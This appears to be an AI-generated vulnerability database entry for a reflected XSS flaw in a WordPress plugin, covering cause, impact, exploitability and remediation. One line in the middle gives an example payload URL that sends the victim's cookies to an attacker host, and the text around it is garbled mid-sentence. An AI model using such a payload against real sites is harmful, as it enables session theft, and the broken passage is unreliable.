
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1754 is a Reflected Cross-Site Scripting (XSS) vulnerability in the personal-authors-category plugin for WordPress. It affects all versions up to and including 0.3, stemming from insufficient input sanitization and output escaping of the URL path. Unauthenticated attackers can inject arbitrary web scripts into pages that execute when a victim is tricked into clicking a malicious link. It was published on February 14, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin fails to sanitize or escape user-supplied input from the URL path before reflecting it in the generated HTML page, enabling script injection. Exploitation requires no authentication and no special privileges, but does require user interaction — specifically, a victim must follow a crafted link. The attack vector is network-based with low complexity (Red Hat CVE, Infinitsec Post).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, defacement of page content visible to the victim, or redirection to malicious sites. Confidentiality and integrity are both rated as low impact, and availability is not affected; however, chained with other vulnerabilities, stolen session cookies could enable account takeover of WordPress administrators (Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1754 as of the available data. The EPSS score is approximately 0.082%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering to trick a user into clicking a crafted URL, which limits opportunistic mass exploitation (Red Hat CVE).
https://target-site.com/[vulnerable-path]/<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.%3Cscript%3E, %3C%2Fscript%3E) or JavaScript event handlers in the URL path.The primary remediation is to update the personal-authors-category plugin to a version beyond 0.3 that includes proper input sanitization and output escaping. If no patched version is yet available, site administrators should deactivate and remove the plugin until a fix is released. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help mitigate reflected XSS attacks as a temporary measure. WordPress administrators should also educate users about phishing links and enable Content Security Policy (CSP) headers where possible (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."